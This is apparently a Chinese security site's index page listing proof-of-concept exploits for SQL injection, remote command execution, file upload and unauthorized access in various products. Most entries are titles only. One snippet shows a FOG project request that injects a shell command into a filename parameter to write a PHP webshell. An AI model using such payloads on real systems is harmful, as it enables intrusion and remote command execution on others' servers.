POC 第37页
【2025特殊通用】扁鹊飞救智能急救与质控系统GetLyfsByParams SQLi_秃兔安全

【2025特殊通用】扁鹊飞救智能急救与质控系统GetLyfsByParams SQLi

fofa语句yakit插件 uuidpocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2921年前
011115
【通用】泛微e-office index.php sql注入漏洞_秃兔安全

【通用】泛微e-office index.php sql注入漏洞

fofayakit插件 uuidpocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2921年前
011010
【通用】YourPHPCMS系统 Register_checkEmail sql注入漏洞_秃兔安全

【通用】YourPHPCMS系统 Register_checkEmail sql注入漏洞

fofa语句yakit插件 uuidpoc yakit yamlnuclei yaml已验证   
H3C Workspace 云桌面 远程命令执行漏洞_秃兔安全
绿盟 SAS堡垒机 Exec 远程命令执行漏洞_秃兔安全
【通用】华天软件Inforcenter PLM uploadFileToIIS 文件上传_秃兔安全

【通用】华天软件Inforcenter PLM uploadFileToIIS 文件上传

fofa语句yakit插件 uuidpoc已验证  
dreamer292的头像_秃兔安全至尊玉兔dreamer2921年前
01107
fogproject系统接口export.php存在远程命令执行漏洞_秃兔安全

fogproject系统接口export.php存在远程命令执行漏洞

POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
01095
360天擎 – 未授权访问_秃兔安全
云课网校系统uploadImage存在任意文件上传漏洞_秃兔安全
禅道研发项⽬管理系统未授权_秃兔安全

禅道研发项⽬管理系统未授权

import requests def check(url):url1 = url+’/misc-captcha-user.html’# url1 = url+’/index.php?m=misc&f=captcha&sessionVar=user’#非伪静态版本按照此格式传参# url2 = url+’/...
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
010813